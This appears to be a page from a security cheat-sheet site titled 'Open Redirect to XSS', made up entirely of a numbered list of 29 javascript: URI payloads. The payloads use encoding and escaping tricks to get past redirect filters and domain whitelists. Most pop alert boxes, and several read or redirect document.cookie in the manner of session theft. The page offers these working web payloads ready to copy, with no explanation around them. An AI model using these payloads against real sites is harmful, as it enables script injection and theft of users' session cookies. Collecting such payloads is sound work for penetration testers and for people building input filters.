pwny.cc
Search…
Open Redirect to XSS

Payloads

1
javascript:alert(1)
2
java%0d%0ascript%0d%0a:alert(0)
3
javascript://%250Aalert(1)
4
javascript://%250Aalert(1)//?1
5
javascript://%250A1?alert(1):0
6
%09Jav%09ascript:alert(document.domain)
7
javascript://%250Alert(document.location=document.cookie)
8
/%09/javascript:alert(1);
9
/%09/javascript:alert(1)
10
//%5cjavascript:alert(1);
11
//%5cjavascript:alert(1)
12
/%5cjavascript:alert(1);
13
/%5cjavascript:alert(1)
14
javascript://%0aalert(1)
15
<>javascript:alert(1);
16
//javascript:alert(1);
17
//javascript:alert(1)
18
/javascript:alert(1);
19
/javascript:alert(1)
20
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
21
javascript:alert(1);
22
javascript:alert(1)
23
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
24
javascript:confirm(1)
25
javascript://https://whitelisted.com/?z=%0Aalert(1)
26
javascript:prompt(1)
27
jaVAscript://whitelisted.com//%0d%0aalert(1);//
28
javascript://whitelisted.com?%a0alert%281%29
29
/x:1/:///%01javascript:alert(document.cookie)/
Copied!
Copy link